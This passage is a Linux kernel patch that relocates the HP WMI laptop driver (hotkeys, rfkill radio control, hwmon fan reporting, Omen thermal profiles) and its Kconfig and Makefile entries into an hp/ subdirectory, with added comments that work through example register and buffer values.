+-				  hp_wmi_get_sw_state(HPWMI_WIFI),
+-				  hp_wmi_get_hw_state(HPWMI_WIFI));
+-	if (bluetooth_rfkill)
+-		rfkill_set_states(bluetooth_rfkill,
+-				  hp_wmi_get_sw_state(HPWMI_BLUETOOTH),
+-				  hp_wmi_get_hw_state(HPWMI_BLUETOOTH));
+-	if (wwan_rfkill)
+-		rfkill_set_states(wwan_rfkill,
+-				  hp_wmi_get_sw_state(HPWMI_WWAN),
+-				  hp_wmi_get_hw_state(HPWMI_WWAN));
+-
+-	return 0;
+-}
+-
+-static const struct dev_pm_ops hp_wmi_pm_ops = {
+-	.resume  = hp_wmi_resume_handler,
+-	.restore  = hp_wmi_resume_handler,
+-};
+-
+-static struct platform_driver hp_wmi_driver = {
+-	.driver = {
+-		.name = "hp-wmi",
+-		.pm = &hp_wmi_pm_ops,
+-		.dev_groups = hp_wmi_groups,
+-	},
+-	.remove = __exit_p(hp_wmi_bios_remove),
+-};
+-
+-static umode_t hp_wmi_hwmon_is_visible(const void *data,
+-				       enum hwmon_sensor_types type,
+-				       u32 attr, int channel)
+-{
+-	switch (type) {
+-	case hwmon_pwm:
+-		return 0644;
+-	case hwmon_fan:
+-		if (hp_wmi_get_fan_speed(channel) >= 0)
+-			return 0444;
+-		break;
+-	default:
+-		return 0;
+-	}
+-
+-	return 0;
+-}
+-
+-static int hp_wmi_hwmon_read(struct device *dev, enum hwmon_sensor_types type,
+-			     u32 attr, int channel, long *val)
+-{
+-	int ret;
+-
+-	switch (type) {
+-	case hwmon_fan:
+-		ret = hp_wmi_get_fan_speed(channel);
+-
+-		if (ret < 0)
+-			return ret;
+-		*val = ret;
+-		return 0;
+-	case hwmon_pwm:
+-		switch (hp_wmi_fan_speed_max_get()) {
+-		case 0:
+-			/* 0 is automatic fan, which is 2 for hwmon */
+-			*val = 2;
+-			return 0;
+-		case 1:
+-			/* 1 is max fan, which is 0
+-			 * (no fan speed control) for hwmon
+-			 */
+-			*val = 0;
+-			return 0;
+-		default:
+-			/* shouldn't happen */
+-			return -ENODATA;
+-		}
+-	default:
+-		return -EINVAL;
+-	}
+-}
+-
+-static int hp_wmi_hwmon_write(struct device *dev, enum hwmon_sensor_types type,
+-			      u32 attr, int channel, long val)
+-{
+-	switch (type) {
+-	case hwmon_pwm:
+-		switch (val) {
+-		case 0:
+-			/* 0 is no fan speed control (max), which is 1 for us */
+-			return hp_wmi_fan_speed_max_set(1);
+-		case 2:
+-			/* 2 is automatic speed control, which is 0 for us */
+-			return hp_wmi_fan_speed_max_set(0);
+-		default:
+-			/* we don't support manual fan speed control */
+-			return -EINVAL;
+-		}
+-	default:
+-		return -EOPNOTSUPP;
+-	}
+-}
+-
+-static const struct hwmon_channel_info *info[] = {
+-	HWMON_CHANNEL_INFO(fan, HWMON_F_INPUT, HWMON_F_INPUT),
+-	HWMON_CHANNEL_INFO(pwm, HWMON_PWM_ENABLE),
+-	NULL
+-};
+-
+-static const struct hwmon_ops ops = {
+-	.is_visible = hp_wmi_hwmon_is_visible,
+-	.read = hp_wmi_hwmon_read,
+-	.write = hp_wmi_hwmon_write,
+-};
+-
+-static const struct hwmon_chip_info chip_info = {
+-	.ops = &ops,
+-	.info = info,
+-};
+-
+-static int hp_wmi_hwmon_init(void)
+-{
+-	struct device *dev = &hp_wmi_platform_dev->dev;
+-	struct device *hwmon;
+-
+-	hwmon = devm_hwmon_device_register_with_info(dev, "hp", &hp_wmi_driver,
+-						     &chip_info, NULL);
+-
+-	if (IS_ERR(hwmon)) {
+-		dev_err(dev, "Could not register hp hwmon device\n");
+-		return PTR_ERR(hwmon);
+-	}
+-
+-	return 0;
+-}
+-
+-static int __init hp_wmi_init(void)
+-{
+-	int event_capable = wmi_has_guid(HPWMI_EVENT_GUID);
+-	int bios_capable = wmi_has_guid(HPWMI_BIOS_GUID);
+-	int err, tmp = 0;
+-
+-	if (!bios_capable && !event_capable)
+-		return -ENODEV;
+-
+-	if (hp_wmi_perform_query(HPWMI_HARDWARE_QUERY, HPWMI_READ, &tmp,
+-				 sizeof(tmp), sizeof(tmp)) == HPWMI_RET_INVALID_PARAMETERS)
+-		zero_insize_support = true;
+-
+-	if (event_capable) {
+-		err = hp_wmi_input_setup();
+-		if (err)
+-			return err;
+-	}
+-
+-	if (bios_capable) {
+-		hp_wmi_platform_dev =
+-			platform_device_register_simple("hp-wmi", PLATFORM_DEVID_NONE, NULL, 0);
+-		if (IS_ERR(hp_wmi_platform_dev)) {
+-			err = PTR_ERR(hp_wmi_platform_dev);
+-			goto err_destroy_input;
+-		}
+-
+-		err = platform_driver_probe(&hp_wmi_driver, hp_wmi_bios_setup);
+-		if (err)
+-			goto err_unregister_device;
+-	}
+-
+-	return 0;
+-
+-err_unregister_device:
+-	platform_device_unregister(hp_wmi_platform_dev);
+-err_destroy_input:
+-	if (event_capable)
+-		hp_wmi_input_destroy();
+-
+-	return err;
+-}
+-module_init(hp_wmi_init);
+-
+-static void __exit hp_wmi_exit(void)
+-{
+-	if (wmi_has_guid(HPWMI_EVENT_GUID))
+-		hp_wmi_input_destroy();
+-
+-	if (hp_wmi_platform_dev) {
+-		platform_device_unregister(hp_wmi_platform_dev);
+-		platform_driver_unregister(&hp_wmi_driver);
+-	}
+-}
+-module_exit(hp_wmi_exit);
+diff --git a/drivers/platform/x86/hp/Kconfig b/drivers/platform/x86/hp/Kconfig
+new file mode 100644
+index 0000000000000..ae165955311ce
+--- /dev/null
++++ b/drivers/platform/x86/hp/Kconfig
+@@ -0,0 +1,63 @@
++# SPDX-License-Identifier: GPL-2.0-only
++#
++# X86 Platform Specific Drivers
++#
++menuconfig X86_PLATFORM_DRIVERS_HP
++	bool "HP X86 Platform Specific Device Drivers"
++	depends on X86_PLATFORM_DEVICES
++	help
++	  Say Y here to get to see options for device drivers for various
++	  HP x86 platforms, including vendor-specific laptop extension drivers.
++	  This option alone does not add any kernel code.
++
++	  If you say N, all options in this submenu will be skipped and disabled.
++
++if X86_PLATFORM_DRIVERS_HP
++
++config HP_ACCEL
++	tristate "HP laptop accelerometer"
++	default m
++	depends on INPUT && ACPI
++	depends on SERIO_I8042
++	select SENSORS_LIS3LV02D
++	select NEW_LEDS
++	select LEDS_CLASS
++	help
++	  This driver provides support for the "Mobile Data Protection System 3D"
++	  or "3D DriveGuard" feature of HP laptops. On such systems the driver
++	  should load automatically (via ACPI alias).
++
++	  Support for an LED indicating disk protection will be provided as
++	  hp::hddprotect. For more information on the feature, refer to
++	  Documentation/misc-devices/lis3lv02d.rst.
++
++	  To compile this driver as a module, choose M here: the module will
++	  be called hp_accel.
++
++config HP_WMI
++	tristate "HP WMI extras"
++	default m
++	depends on ACPI_WMI
++	depends on INPUT
++	depends on RFKILL || RFKILL = n
++	select INPUT_SPARSEKMAP
++	select ACPI_PLATFORM_PROFILE
++	select HWMON
++	help
++	  Say Y here if you want to support WMI-based hotkeys on HP laptops and
++	  to read data from WMI such as docking or ambient light sensor state.
++
++	  To compile this driver as a module, choose M here: the module will
++	  be called hp-wmi.
++
++config TC1100_WMI
++	tristate "HP Compaq TC1100 Tablet WMI Extras"
++	default m
++	depends on !X86_64
++	depends on ACPI
++	depends on ACPI_WMI
++	help
++	  This is a driver for the WMI extensions (wireless and bluetooth power
++	  control) of the HP Compaq TC1100 tablet.
++
++endif # X86_PLATFORM_DRIVERS_HP
+diff --git a/drivers/platform/x86/hp/Makefile b/drivers/platform/x86/hp/Makefile
+new file mode 100644
+index 0000000000000..db1eed4cd7c7d
+--- /dev/null
++++ b/drivers/platform/x86/hp/Makefile
+@@ -0,0 +1,10 @@
++# SPDX-License-Identifier: GPL-2.0
++#
++# Makefile for linux/drivers/platform/x86/hp
++# HP x86 Platform-Specific Drivers
++#
++
++# Hewlett Packard
++obj-$(CONFIG_HP_ACCEL)		+= hp_accel.o
++obj-$(CONFIG_HP_WMI)		+= hp-wmi.o
++obj-$(CONFIG_TC1100_WMI)	+= tc1100-wmi.o
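++
++# For example, CONFIG_HP_WMI=m builds hp-wmi.ko as a module, while =y
++# links the driver into the kernel image; unset symbols are skipped.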
+diff --git a/drivers/platform/x86/hp/hp-wmi.c b/drivers/platform/x86/hp/hp-wmi.c
+new file mode 100644
+index 0000000000000..94af7d398a1bf
+--- /dev/null
++++ b/drivers/platform/x86/hp/hp-wmi.c
+@@ -0,0 +1,1571 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ * HP WMI hotkeys
++ *
++ * Copyright (C) 2008 Red Hat <mjg@redhat.com>
++ * Copyright (C) 2010, 2011 Anssi Hannula <anssi.hannula@iki.fi>
++ *
++ * Portions based on wistron_btns.c:
++ * Copyright (C) 2005 Miloslav Trmac <mitr@volny.cz>
++ * Copyright (C) 2005 Bernhard Rosenkraenzer <bero@arklinux.org>
++ * Copyright (C) 2005 Dmitry Torokhov <dtor@mail.ru>
++ */
++
++#define pr_fmt(fmt) KBUILD_MODNAME ": " fmt
++
++#include <linux/kernel.h>
++#include <linux/module.h>
++#include <linux/init.h>
++#include <linux/slab.h>
++#include <linux/types.h>
++#include <linux/input.h>
++#include <linux/input/sparse-keymap.h>
++#include <linux/platform_device.h>
++#include <linux/platform_profile.h>
++#include <linux/hwmon.h>
++#include <linux/acpi.h>
++#include <linux/rfkill.h>
++#include <linux/string.h>
++#include <linux/dmi.h>
++
++MODULE_AUTHOR("Matthew Garrett <mjg59@srcf.ucam.org>");
++MODULE_DESCRIPTION("HP laptop WMI hotkeys driver");
++MODULE_LICENSE("GPL");
++
++MODULE_ALIAS("wmi:95F24279-4D7B-4334-9387-ACCDC67EF61C");
++MODULE_ALIAS("wmi:5FB7F034-2C63-45e9-BE91-3D44E2C707E4");
++
++#define HPWMI_EVENT_GUID "95F24279-4D7B-4334-9387-ACCDC67EF61C"
++#define HPWMI_BIOS_GUID "5FB7F034-2C63-45e9-BE91-3D44E2C707E4"
++#define HP_OMEN_EC_THERMAL_PROFILE_OFFSET 0x95
++#define zero_if_sup(tmp) (zero_insize_support ? 0 : sizeof(tmp)) /* use when zero insize is required */
++
++/* DMI board names of devices that should use the Omen-specific path for
++ * thermal profiles.
++ * This list was obtained by inspecting the Windows Omen Command Center
++ * app and parsing the JSON file it uses to determine what capabilities
++ * a device should have.
++ * A device is considered an Omen if the DisplayName in that list contains
++ * "OMEN", and it can use thermal profiles if the "Feature" array
++ * contains "PerformanceControl".
++ */
++static const char * const omen_thermal_profile_boards[] = {
++	"84DA", "84DB", "84DC", "8574", "8575", "860A", "87B5", "8572", "8573",
++	"8600", "8601", "8602", "8605", "8606", "8607", "8746", "8747", "8749",
++	"874A", "8603", "8604", "8748", "886B", "886C", "878A", "878B", "878C",
++	"88C8", "88CB", "8786", "8787", "8788", "88D1", "88D2", "88F4", "88FD",
++	"88F5", "88F6", "88F7", "88FE", "88FF", "8900", "8901", "8902", "8912",
++	"8917", "8918", "8949", "894A", "89EB"
++};
++
++/* DMI board names of Omen laptops that are specifically set to thermal
++ * profile version 0 by the Omen Command Center app, regardless of what
++ * the HPWMI_GET_SYSTEM_DESIGN_DATA WMI call returns.
++ */
++static const char *const omen_thermal_profile_force_v0_boards[] = {
++	"8607", "8746", "8747", "8749", "874A", "8748"
++};
++
++enum hp_wmi_radio {
++	HPWMI_WIFI	= 0x0,
++	HPWMI_BLUETOOTH	= 0x1,
++	HPWMI_WWAN	= 0x2,
++	HPWMI_GPS	= 0x3,
++};
++
++enum hp_wmi_event_ids {
++	HPWMI_DOCK_EVENT		= 0x01,
++	HPWMI_PARK_HDD			= 0x02,
++	HPWMI_SMART_ADAPTER		= 0x03,
++	HPWMI_BEZEL_BUTTON		= 0x04,
++	HPWMI_WIRELESS			= 0x05,
++	HPWMI_CPU_BATTERY_THROTTLE	= 0x06,
++	HPWMI_LOCK_SWITCH		= 0x07,
++	HPWMI_LID_SWITCH		= 0x08,
++	HPWMI_SCREEN_ROTATION		= 0x09,
++	HPWMI_COOLSENSE_SYSTEM_MOBILE	= 0x0A,
++	HPWMI_COOLSENSE_SYSTEM_HOT	= 0x0B,
++	HPWMI_PROXIMITY_SENSOR		= 0x0C,
++	HPWMI_BACKLIT_KB_BRIGHTNESS	= 0x0D,
++	HPWMI_PEAKSHIFT_PERIOD		= 0x0F,
++	HPWMI_BATTERY_CHARGE_PERIOD	= 0x10,
++	HPWMI_SANITIZATION_MODE		= 0x17,
++	HPWMI_OMEN_KEY			= 0x1D,
++	HPWMI_SMART_EXPERIENCE_APP	= 0x21,
++};
++
++/*
++ * struct bios_args buffer is dynamically allocated.  New WMI command types
++ * were introduced that exceed the 128-byte data size.  Changes to handle
++ * the data size allocation scheme are kept in the hp_wmi_perform_query function.
++ */
++struct bios_args {
++	u32 signature;
++	u32 command;
++	u32 commandtype;
++	u32 datasize;
++	u8 data[];
++};
++
++enum hp_wmi_commandtype {
++	HPWMI_DISPLAY_QUERY		= 0x01,
++	HPWMI_HDDTEMP_QUERY		= 0x02,
++	HPWMI_ALS_QUERY			= 0x03,
++	HPWMI_HARDWARE_QUERY		= 0x04,
++	HPWMI_WIRELESS_QUERY		= 0x05,
++	HPWMI_BATTERY_QUERY		= 0x07,
++	HPWMI_BIOS_QUERY		= 0x09,
++	HPWMI_FEATURE_QUERY		= 0x0b,
++	HPWMI_HOTKEY_QUERY		= 0x0c,
++	HPWMI_FEATURE2_QUERY		= 0x0d,
++	HPWMI_WIRELESS2_QUERY		= 0x1b,
++	HPWMI_POSTCODEERROR_QUERY	= 0x2a,
++	HPWMI_SYSTEM_DEVICE_MODE	= 0x40,
++	HPWMI_THERMAL_PROFILE_QUERY	= 0x4c,
++};
++
++enum hp_wmi_gm_commandtype {
++	HPWMI_FAN_SPEED_GET_QUERY = 0x11,
++	HPWMI_SET_PERFORMANCE_MODE = 0x1A,
++	HPWMI_FAN_SPEED_MAX_GET_QUERY = 0x26,
++	HPWMI_FAN_SPEED_MAX_SET_QUERY = 0x27,
++	HPWMI_GET_SYSTEM_DESIGN_DATA = 0x28,
++};
++
++enum hp_wmi_command {
++	HPWMI_READ	= 0x01,
++	HPWMI_WRITE	= 0x02,
++	HPWMI_ODM	= 0x03,
++	HPWMI_GM	= 0x20008,
++};
++
++enum hp_wmi_hardware_mask {
++	HPWMI_DOCK_MASK		= 0x01,
++	HPWMI_TABLET_MASK	= 0x04,
++};
++
++struct bios_return {
++	u32 sigpass;
++	u32 return_code;
++};
++
++enum hp_return_value {
++	HPWMI_RET_WRONG_SIGNATURE	= 0x02,
++	HPWMI_RET_UNKNOWN_COMMAND	= 0x03,
++	HPWMI_RET_UNKNOWN_CMDTYPE	= 0x04,
++	HPWMI_RET_INVALID_PARAMETERS	= 0x05,
++};
++
++enum hp_wireless2_bits {
++	HPWMI_POWER_STATE	= 0x01,
++	HPWMI_POWER_SOFT	= 0x02,
++	HPWMI_POWER_BIOS	= 0x04,
++	HPWMI_POWER_HARD	= 0x08,
++	HPWMI_POWER_FW_OR_HW	= HPWMI_POWER_BIOS | HPWMI_POWER_HARD,
++};
++
++enum hp_thermal_profile_omen_v0 {
++	HP_OMEN_V0_THERMAL_PROFILE_DEFAULT     = 0x00,
++	HP_OMEN_V0_THERMAL_PROFILE_PERFORMANCE = 0x01,
++	HP_OMEN_V0_THERMAL_PROFILE_COOL        = 0x02,
++};
++
++enum hp_thermal_profile_omen_v1 {
++	HP_OMEN_V1_THERMAL_PROFILE_DEFAULT	= 0x30,
++	HP_OMEN_V1_THERMAL_PROFILE_PERFORMANCE	= 0x31,
++	HP_OMEN_V1_THERMAL_PROFILE_COOL		= 0x50,
++};
++
++enum hp_thermal_profile {
++	HP_THERMAL_PROFILE_PERFORMANCE	= 0x00,
++	HP_THERMAL_PROFILE_DEFAULT		= 0x01,
++	HP_THERMAL_PROFILE_COOL			= 0x02,
++	HP_THERMAL_PROFILE_QUIET		= 0x03,
++};
++
++#define IS_HWBLOCKED(x) ((x & HPWMI_POWER_FW_OR_HW) != HPWMI_POWER_FW_OR_HW)
++#define IS_SWBLOCKED(x) !(x & HPWMI_POWER_SOFT)
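++
++/*
++ * Example: a power value of 0x0d (STATE | BIOS | HARD set, SOFT clear)
++ * is soft-blocked (IS_SWBLOCKED is true since HPWMI_POWER_SOFT is unset)
++ * but not hard-blocked (both bits of HPWMI_POWER_FW_OR_HW are set, so
++ * IS_HWBLOCKED is false).
++ */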
++
++struct bios_rfkill2_device_state {
++	u8 radio_type;
++	u8 bus_type;
++	u16 vendor_id;
++	u16 product_id;
++	u16 subsys_vendor_id;
++	u16 subsys_product_id;
++	u8 rfkill_id;
++	u8 power;
++	u8 unknown[4];
++};
++
++/* 7 devices fit into the 128 byte buffer */
++#define HPWMI_MAX_RFKILL2_DEVICES	7
++
++struct bios_rfkill2_state {
++	u8 unknown[7];
++	u8 count;
++	u8 pad[8];
++	struct bios_rfkill2_device_state device[HPWMI_MAX_RFKILL2_DEVICES];
++};
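++
++/*
++ * Size check: the 16-byte header (7 + 1 + 8 bytes) plus seven 16-byte
++ * device entries adds up to exactly the 128-byte buffer noted above.
++ */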
++
++static const struct key_entry hp_wmi_keymap[] = {
++	{ KE_KEY, 0x02,    { KEY_BRIGHTNESSUP } },
++	{ KE_KEY, 0x03,    { KEY_BRIGHTNESSDOWN } },
++	{ KE_KEY, 0x270,   { KEY_MICMUTE } },
++	{ KE_KEY, 0x20e6,  { KEY_PROG1 } },
++	{ KE_KEY, 0x20e8,  { KEY_MEDIA } },
++	{ KE_KEY, 0x2142,  { KEY_MEDIA } },
++	{ KE_KEY, 0x213b,  { KEY_INFO } },
++	{ KE_KEY, 0x2169,  { KEY_ROTATE_DISPLAY } },
++	{ KE_KEY, 0x216a,  { KEY_SETUP } },
++	{ KE_KEY, 0x21a5,  { KEY_PROG2 } }, /* HP Omen Key */
++	{ KE_KEY, 0x21a7,  { KEY_FN_ESC } },
++	{ KE_KEY, 0x21a9,  { KEY_TOUCHPAD_OFF } },
++	{ KE_KEY, 0x121a9, { KEY_TOUCHPAD_ON } },
++	{ KE_KEY, 0x231b,  { KEY_HELP } },
++	{ KE_END, 0 }
++};
++
++static struct input_dev *hp_wmi_input_dev;
++static struct platform_device *hp_wmi_platform_dev;
++static struct platform_profile_handler platform_profile_handler;
++static bool platform_profile_support;
++static bool zero_insize_support;
++
++static struct rfkill *wifi_rfkill;
++static struct rfkill *bluetooth_rfkill;
++static struct rfkill *wwan_rfkill;
++
++struct rfkill2_device {
++	u8 id;
++	int num;
++	struct rfkill *rfkill;
++};
++
++static int rfkill2_count;
++static struct rfkill2_device rfkill2[HPWMI_MAX_RFKILL2_DEVICES];
++
++/*
++ * Chassis Types values were obtained from SMBIOS reference
++ * specification version 3.00. A complete list of system enclosures
++ * and chassis types is available on Table 17.
++ */
++static const char * const tablet_chassis_types[] = {
++	"30", /* Tablet */
++	"31", /* Convertible */
++	"32"  /* Detachable */
++};
++
++#define DEVICE_MODE_TABLET	0x06
++
++/* map output size to the corresponding WMI method id */
++static inline int encode_outsize_for_pvsz(int outsize)
++{
++	if (outsize > 4096)
++		return -EINVAL;
++	if (outsize > 1024)
++		return 5;
++	if (outsize > 128)
++		return 4;
++	if (outsize > 4)
++		return 3;
++	if (outsize > 0)
++		return 2;
++	return 1;
++}
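++
++/*
++ * With the thresholds above, an outsize of 0 maps to method id 1, 4 maps
++ * to 2, 128 to 3, 1024 to 4 and 4096 to 5; anything above 4096 is
++ * rejected with -EINVAL.
++ */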
++
++/*
++ * hp_wmi_perform_query
++ *
++ * query:	The commandtype (enum hp_wmi_commandtype)
++ * write:	The command (enum hp_wmi_command)
++ * buffer:	Buffer used as input and/or output
++ * insize:	Size of input buffer
++ * outsize:	Size of output buffer
++ *
++ * returns zero on success
++ *         an HP WMI query specific error code (which is positive)
++ *         -EINVAL if the query was not successful at all
++ *         -EINVAL if the output buffer size exceeds buffersize
++ *
++ * Note: The buffersize must at least be the maximum of the input and output
++ *       size. E.g. Battery info query is defined to have 1 byte input
++ *       and 128 byte output. The caller would do:
++ *       buffer = kzalloc(128, GFP_KERNEL);
++ *       ret = hp_wmi_perform_query(HPWMI_BATTERY_QUERY, HPWMI_READ, buffer, 1, 128)
++ */
++static int hp_wmi_perform_query(int query, enum hp_wmi_command command,
++				void *buffer, int insize, int outsize)
++{
++	struct acpi_buffer input, output = { ACPI_ALLOCATE_BUFFER, NULL };
++	struct bios_return *bios_return;
++	union acpi_object *obj = NULL;
++	struct bios_args *args = NULL;
++	int mid, actual_insize, actual_outsize;
++	size_t bios_args_size;
++	int ret;
++
++	mid = encode_outsize_for_pvsz(outsize);
++	if (WARN_ON(mid < 0))
++		return mid;
++
++	actual_insize = max(insize, 128);
++	bios_args_size = struct_size(args, data, actual_insize);
++	args = kmalloc(bios_args_size, GFP_KERNEL);
++	if (!args)
++		return -ENOMEM;
++
++	input.length = bios_args_size;
++	input.pointer = args;
++
++	args->signature = 0x55434553;
++	args->command = command;
++	args->commandtype = query;
++	args->datasize = insize;
++	memcpy(args->data, buffer, flex_array_size(args, data, insize));
++
++	ret = wmi_evaluate_method(HPWMI_BIOS_GUID, 0, mid, &input, &output);
++	if (ret)
++		goto out_free;
++
++	obj = output.pointer;
++	if (!obj) {
++		ret = -EINVAL;
++		goto out_free;
++	}
++
++	if (obj->type != ACPI_TYPE_BUFFER) {
++		pr_warn("query 0x%x returned an invalid object type 0x%x\n", query, obj->type);
++		ret = -EINVAL;
++		goto out_free;
++	}
++
++	bios_return = (struct bios_return *)obj->buffer.pointer;
++	ret = bios_return->return_code;
++
++	if (ret) {
++		if (ret != HPWMI_RET_UNKNOWN_COMMAND &&
++		    ret != HPWMI_RET_UNKNOWN_CMDTYPE)
++			pr_warn("query 0x%x returned error 0x%x\n", query, ret);
++		goto out_free;
++	}
++
++	/* Ignore output data of zero size */
++	if (!outsize)
++		goto out_free;
++
++	actual_outsize = min(outsize, (int)(obj->buffer.length - sizeof(*bios_return)));
++	memcpy(buffer, obj->buffer.pointer + sizeof(*bios_return), actual_outsize);
++	memset(buffer + actual_outsize, 0, outsize - actual_outsize);
++
++out_free:
++	kfree(obj);
++	kfree(args);
++	return ret;
++}
++
++static int hp_wmi_get_fan_speed(int fan)
++{
++	u8 fsh, fsl;
++	char fan_data[4] = { fan, 0, 0, 0 };
++
++	int ret = hp_wmi_perform_query(HPWMI_FAN_SPEED_GET_QUERY, HPWMI_GM,
++				       &fan_data, sizeof(char),
++				       sizeof(fan_data));
++
++	if (ret != 0)
++		return -EINVAL;
++
++	fsh = fan_data[2];
++	fsl = fan_data[3];
++
++	return (fsh << 8) | fsl;
++}
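++
++/*
++ * Example: fan_data[2] = 0x0a and fan_data[3] = 0x28 combine into
++ * 0x0a28 = 2600, one 16-bit fan speed reading as exposed via hwmon
++ * (which reports fan input in RPM).
++ */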
++
++static int hp_wmi_read_int(int query)
++{
++	int val = 0, ret;
++
++	ret = hp_wmi_perform_query(query, HPWMI_READ, &val,
++				   zero_if_sup(val), sizeof(val));
++
++	if (ret)
++		return ret < 0 ? ret : -EINVAL;
++
++	return val;
++}
++
++static int hp_wmi_get_dock_state(void)
++{
++	int state = hp_wmi_read_int(HPWMI_HARDWARE_QUERY);
++
++	if (state < 0)
++		return state;
++
++	return !!(state & HPWMI_DOCK_MASK);
++}
++
++static int hp_wmi_get_tablet_mode(void)
++{
++	char system_device_mode[4] = { 0 };
++	const char *chassis_type;
++	bool tablet_found;
++	int ret;
++
++	chassis_type = dmi_get_system_info(DMI_CHASSIS_TYPE);
++	if (!chassis_type)
++		return -ENODEV;
++
++	tablet_found = match_string(tablet_chassis_types,
++				    ARRAY_SIZE(tablet_chassis_types),
++				    chassis_type) >= 0;
++	if (!tablet_found)
++		return -ENODEV;
++
++	ret = hp_wmi_perform_query(HPWMI_SYSTEM_DEVICE_MODE, HPWMI_READ,
++				   system_device_mode, zero_if_sup(system_device_mode),
++				   sizeof(system_device_mode));
++	if (ret < 0)
++		return ret;
++
++	return system_device_mode[0] == DEVICE_MODE_TABLET;
++}
++
++static int omen_thermal_profile_set(int mode)
++{
++	char buffer[2] = {0, mode};
++	int ret;
++
++	ret = hp_wmi_perform_query(HPWMI_SET_PERFORMANCE_MODE, HPWMI_GM,
++				   &buffer, sizeof(buffer), 0);
++
++	if (ret)
++		return ret < 0 ? ret : -EINVAL;
++
++	return mode;
++}
++
++static bool is_omen_thermal_profile(void)
++{
++	const char *board_name = dmi_get_system_info(DMI_BOARD_NAME);
++
++	if (!board_name)
++		return false;
++
++	return match_string(omen_thermal_profile_boards,
++			    ARRAY_SIZE(omen_thermal_profile_boards),
++			    board_name) >= 0;
++}
++
++static int omen_get_thermal_policy_version(void)
++{
++	unsigned char buffer[8] = { 0 };
++	int ret;
++
++	const char *board_name = dmi_get_system_info(DMI_BOARD_NAME);
++
++	if (board_name) {
++		int matches = match_string(omen_thermal_profile_force_v0_boards,
++			ARRAY_SIZE(omen_thermal_profile_force_v0_boards),
++			board_name);
++		if (matches >= 0)
++			return 0;
++	}
++
++	ret = hp_wmi_perform_query(HPWMI_GET_SYSTEM_DESIGN_DATA, HPWMI_GM,
++				   &buffer, sizeof(buffer), sizeof(buffer));
++
++	if (ret)
++		return ret < 0 ? ret : -EINVAL;
++
++	return buffer[3];
++}
++
++static int omen_thermal_profile_get(void)
++{
++	u8 data;
++
++	int ret = ec_read(HP_OMEN_EC_THERMAL_PROFILE_OFFSET, &data);
++
++	if (ret)
++		return ret;
++
++	return data;
++}
++
++static int hp_wmi_fan_speed_max_set(int enabled)
++{
++	int ret;
++
++	ret = hp_wmi_perform_query(HPWMI_FAN_SPEED_MAX_SET_QUERY, HPWMI_GM,
++				   &enabled, sizeof(enabled), 0);
++
++	if (ret)
++		return ret < 0 ? ret : -EINVAL;
++
++	return enabled;
++}
++
++static int hp_wmi_fan_speed_max_get(void)
++{
++	int val = 0, ret;
++
++	ret = hp_wmi_perform_query(HPWMI_FAN_SPEED_MAX_GET_QUERY, HPWMI_GM,
++				   &val, zero_if_sup(val), sizeof(val));
++
++	if (ret)
++		return ret < 0 ? ret : -EINVAL;
++
++	return val;
++}
++
++static int __init hp_wmi_bios_2008_later(void)
++{
++	int state = 0;
++	int ret = hp_wmi_perform_query(HPWMI_FEATURE_QUERY, HPWMI_READ, &state,
++				       zero_if_sup(state), sizeof(state));
++	if (!ret)
++		return 1;
++
++	return (ret == HPWMI_RET_UNKNOWN_CMDTYPE) ? 0 : -ENXIO;
++}
++
++static int __init hp_wmi_bios_2009_later(void)
++{
++	u8 state[128];
++	int ret = hp_wmi_perform_query(HPWMI_FEATURE2_QUERY, HPWMI_READ, &state,
++				       zero_if_sup(state), sizeof(state));
++	if (!ret)
++		return 1;
++
++	return (ret == HPWMI_RET_UNKNOWN_CMDTYPE) ? 0 : -ENXIO;
++}
++
++static int __init hp_wmi_enable_hotkeys(void)
++{
++	int value = 0x6e;
++	int ret = hp_wmi_perform_query(HPWMI_BIOS_QUERY, HPWMI_WRITE, &value,
++				       sizeof(value), 0);
++
++	return ret <= 0 ? ret : -EINVAL;
++}
++
++static int hp_wmi_set_block(void *data, bool blocked)
++{
++	enum hp_wmi_radio r = (enum hp_wmi_radio) data;
++	int query = BIT(r + 8) | ((!blocked) << r);
++	int ret;
++
++	ret = hp_wmi_perform_query(HPWMI_WIRELESS_QUERY, HPWMI_WRITE,
++				   &query, sizeof(query), 0);
++
++	return ret <= 0 ? ret : -EINVAL;
++}
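++
++/*
++ * Example for the query word built above: unblocking Wi-Fi
++ * (r = HPWMI_WIFI = 0, blocked = false) sends BIT(8) | 1 = 0x101,
++ * while blocking Bluetooth (r = HPWMI_BLUETOOTH = 1) sends
++ * BIT(9) | 0 = 0x200.
++ */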
++
++static const struct rfkill_ops hp_wmi_rfkill_ops = {
++	.set_block = hp_wmi_set_block,
++};
++
++static bool hp_wmi_get_sw_state(enum hp_wmi_radio r)
++{
++	int mask = 0x200 << (r * 8);
++
++	int wireless = hp_wmi_read_int(HPWMI_WIRELESS_QUERY);
++
++	/* TBD: Pass error */
++	WARN_ONCE(wireless < 0, "error executing HPWMI_WIRELESS_QUERY");
++
++	return !(wireless & mask);
++}
++
++static bool hp_wmi_get_hw_state(enum hp_wmi_radio r)
++{
++	int mask = 0x800 << (r * 8);
++
++	int wireless = hp_wmi_read_int(HPWMI_WIRELESS_QUERY);
++
++	/* TBD: Pass error */
++	WARN_ONCE(wireless < 0, "error executing HPWMI_WIRELESS_QUERY");
++
++	return !(wireless & mask);
++}
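++
++/*
++ * Example for the state masks above: for Bluetooth (r = 1) the
++ * soft-block bit is 0x200 << 8 = 0x20000 and the hard-block bit is
++ * 0x800 << 8 = 0x80000; a clear bit means the radio is blocked.
++ */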
++
++static int hp_wmi_rfkill2_set_block(void *data, bool blocked)
++{
++	int rfkill_id = (int)(long)data;
++	char buffer[4] = { 0x01, 0x00, rfkill_id, !blocked };
++	int ret;
++
++	ret = hp_wmi_perform_query(HPWMI_WIRELESS2_QUERY, HPWMI_WRITE,
++				   buffer, sizeof(buffer), 0);
++
++	return ret <= 0 ? ret : -EINVAL;
++}
++
++static const struct rfkill_ops hp_wmi_rfkill2_ops = {
++	.set_block = hp_wmi_rfkill2_set_block,
++};
++
++static int hp_wmi_rfkill2_refresh(void)
++{
++	struct bios_rfkill2_state state;
++	int err, i;
++
++	err = hp_wmi_perform_query(HPWMI_WIRELESS2_QUERY, HPWMI_READ, &state,
++				   zero_if_sup(state), sizeof(state));
++	if (err)
++		return err;
++
++	for (i = 0; i < rfkill2_count; i++) {
++		int num = rfkill2[i].num;
++		struct bios_rfkill2_device_state *devstate;
++
++		devstate = &state.device[num];
++
++		if (num >= state.count ||
++		    devstate->rfkill_id != rfkill2[i].id) {
++			pr_warn("power configuration of the wireless devices unexpectedly changed\n");
++			continue;
++		}
++
